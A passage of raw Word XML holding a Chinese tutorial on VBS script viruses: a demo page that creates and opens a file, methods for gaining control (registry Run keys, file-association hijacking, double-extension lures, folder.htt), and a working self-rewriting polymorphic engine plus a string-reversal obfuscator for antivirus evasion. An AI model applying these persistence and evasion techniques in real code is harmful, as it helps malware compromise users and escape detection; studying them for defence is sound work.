        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//获取shell对象，以便运行程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WshShell.Run("notepad C:\\testCLSID.txt") </w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//打开C:\\testCLSID.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Catch(e)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>"创建实例"按钮，将会在C盘创建文件，并用记事本打开文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;input type= "button" value= "创建实例" name= "btn" onclick= "creatObj(); return false"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把上面的这些代码保存为</w:t>
      </w:r>
      <w:r>
        <w:t>html的网页格式，打开就看到有一个按钮，如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70061167" wp14:editId="16331315">
            <wp:extent cx="3043033" cy="1370330"/>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4584" cy="1375532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>点击按钮就可以在在</w:t>
      </w:r>
      <w:r>
        <w:t>C盘创建文件，并用记事本打开文件。用杀毒软件扫描看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看，如图</w:t>
      </w:r>
      <w:r>
        <w:t>所示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A9ECC0" wp14:editId="16030DC1">
            <wp:extent cx="3662432" cy="15654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4562" cy="1574912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:r>
        <w:t>提示发现了木马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0089099D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本病毒是如何获得控制权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089099D" w:rsidRDefault="0089099D" w:rsidP="0089099D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于病毒来说，如果没有一定的权限，那它本身就无法执行了，也就不可能进行破坏等动作了，所以如何获取控制权是每一个病毒的核心之一。下面就给介绍几种脚本病毒如何获取权限的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2531" w:rsidRPr="001A2531" w:rsidRDefault="001A2531" w:rsidP="001A2531">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2531">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A2531">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>修改注册表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2531" w:rsidRDefault="001A2531" w:rsidP="001A2531">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Windwos在启动的时候，会自动加载HEKY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Run项下的各键值所指向的程序。脚本病毒可以在此项下加入一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权，</w:t>
      </w:r>
      <w:r>
        <w:t>VBS修改注册表比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单，直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>wsh.RegWrite(strName,anyvalue[,strType])语句即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRPr="00A77088" w:rsidRDefault="00A77088" w:rsidP="00A77088">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77088">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A77088">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>通过映射文件执行方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRDefault="00A77088" w:rsidP="00A77088">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>譬如新欢乐时光将</w:t>
      </w:r>
      <w:r>
        <w:t>dll的执行方式修改为wscript.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>甚至可以将exe文件的映</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>射指向病毒代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRPr="004F0778" w:rsidRDefault="004F0778" w:rsidP="004F0778">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0778">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A77088" w:rsidRPr="004F0778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>欺骗用户，让用户自己执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRDefault="00A77088" w:rsidP="004F0778">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式其实和用户</w:t>
      </w:r>
      <w:r w:rsidR="004F0778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的心理有关。譬如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示，举个例子，文件名为</w:t>
      </w:r>
      <w:r>
        <w:t>beauty.jpg.vbs的vbs程序显示为beauty.jpg，这时用户往往会把它当成一张图片去点击。同样，对于用户自己磁盘中的文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒在感染它们的时候，将原有文件的文件名作为前缀，</w:t>
      </w:r>
      <w:r w:rsidR="00987803">
        <w:t>vbs</w:t>
      </w:r>
      <w:r>
        <w:t>作为后缀产生一个病毒文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并删除原来文件，这样，用户就有可能将这个</w:t>
      </w:r>
      <w:r w:rsidR="00987803">
        <w:t>vbs</w:t>
      </w:r>
      <w:r>
        <w:t>文件看作自己原来的文件运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRPr="00377F59" w:rsidRDefault="004F0778" w:rsidP="00377F59">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377F59">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A77088" w:rsidRPr="00377F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00A77088" w:rsidRPr="00377F59">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>decsktop.ini和folder.htt互相配合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77088" w:rsidRDefault="00A77088" w:rsidP="00377F59">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发</w:t>
      </w:r>
      <w:r>
        <w:t>folder.htt中的病毒代码。这是新欢乐时光</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒采用的一种比较有效的获取控制权的方法。并且利用</w:t>
      </w:r>
      <w:r>
        <w:t>folder.htt，还可能触发</w:t>
      </w:r>
      <w:r w:rsidR="003B38B6">
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidR="00191ABB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这也可能成为病毒得到控制权的一种有效方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2531" w:rsidRDefault="0080155F" w:rsidP="0080155F">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0080155F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本病毒对抗杀毒软件的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080155F" w:rsidRDefault="0080155F" w:rsidP="0080155F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒为了要生存，对抗反病毒软件的能力也是必需的。一般来说，</w:t>
      </w:r>
      <w:r>
        <w:t>VBS脚本病毒采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下几种对抗反病毒软件的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>变量名自动改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以随机选取密钥对自己的部分代码进行加密变换，使得每次感染的病毒代码都不一样，达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术，使得每次感染后的加密病毒的解密后的代码都不一样。下面看一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>VBS 脚本变形引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = CreateObject("Scripting.FileSystemObject")</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//创建文件系统对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00155120">
        <w:t>vCode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:t>Of</w:t>
      </w:r>
      <w:r>
        <w:t>.OpenTextFile(WScript.ScriptFullName, 1).Readall</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//读取自身代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fS</w:t>
      </w:r>
      <w:r>
        <w:t>=Array("</w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vC</w:t>
      </w:r>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fS</w:t>
      </w:r>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fSC</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//定义一个即将被替换字符的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00155120">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fSC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0 To 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vCode = Replace(vCode, </w:t>
      </w:r>
      <w:r w:rsidRPr="003B17CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fS</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003B17CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fSC</w:t>
      </w:r>
      <w:r>
        <w:t>), Chr((Int(Rnd * 22) + 65))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>&amp; Chr((Int(Rnd * 22) + 65)) &amp; Chr((Int(Rnd * 22) + 65))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>&amp; Chr((Int(Rnd * 22) + 65)))</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//取4个随机字符替换数组fS中的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vCode</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//将替换后的代码写回文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRPr="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面这段代码使得该</w:t>
      </w:r>
      <w:r>
        <w:t>VBS文件在每次运行后，其Of，vC，fS，fSC四个字符串都会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用随机字符串来代替，这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7CF7" w:rsidRDefault="00DF7CF7" w:rsidP="00DF7CF7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>脚本加密、加壳与变形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1AE4" w:rsidRDefault="007C3CD5" w:rsidP="007C3CD5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007C3CD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在新欢乐时光病毒中，可以随机选取密钥对自身的部分代码进行加密转换，使得每次感染的病毒代码都不一样，而且病毒还可以进一步地采用变形技术，使得每次感染后的甲醚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒在解密后的代码都不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1BDE" w:rsidRDefault="007C3CD5" w:rsidP="007C3CD5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用脚本编码器</w:t>
      </w:r>
      <w:r w:rsidR="006C1AE4">
        <w:t>ScrEnc.EXE</w:t>
      </w:r>
      <w:r>
        <w:t>之类的工具软件加密脚本，甲醚后的脚本能被WSH直接解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释。不过加密是可逆的，所以现在所有的杀毒软件都有解码的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3CD5" w:rsidRDefault="007C3CD5" w:rsidP="007C3CD5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidR="00767BD9">
        <w:t>病毒的免杀，</w:t>
      </w:r>
      <w:r>
        <w:t>最先想到的应该是“加壳”吧。不过在脚本上也可以用用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个办法，例如下面的代码就是一个最简单的壳了，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>str="cswpire.tohco" ""!K"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>For i=1 to Len(str) Step 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>rev=rev+StrReverse(Mid(str,i,3))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Execute rev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>WScript.Echo str &amp; Chr(13) &amp; Chr(13) &amp; rev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个壳就是弹出一个对话框显示</w:t>
      </w:r>
      <w:r>
        <w:t>OK！，最后一行只是为了显示其运算结果。壳的算法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是每</w:t>
      </w:r>
      <w:r>
        <w:t>n个字符就反转顺序一次。n在这里是等于3。不过这个壳是死的，起不到减少特征码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的效果，反而增加了特征码，如</w:t>
      </w:r>
      <w:r>
        <w:t>cswpire。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230801" w:rsidRDefault="00230801" w:rsidP="00767BD9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面</w:t>
      </w:r>
      <w:r w:rsidRPr="00230801">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举一个更复杂的例子，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230801" w:rsidRDefault="00230801" w:rsidP="001476C2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
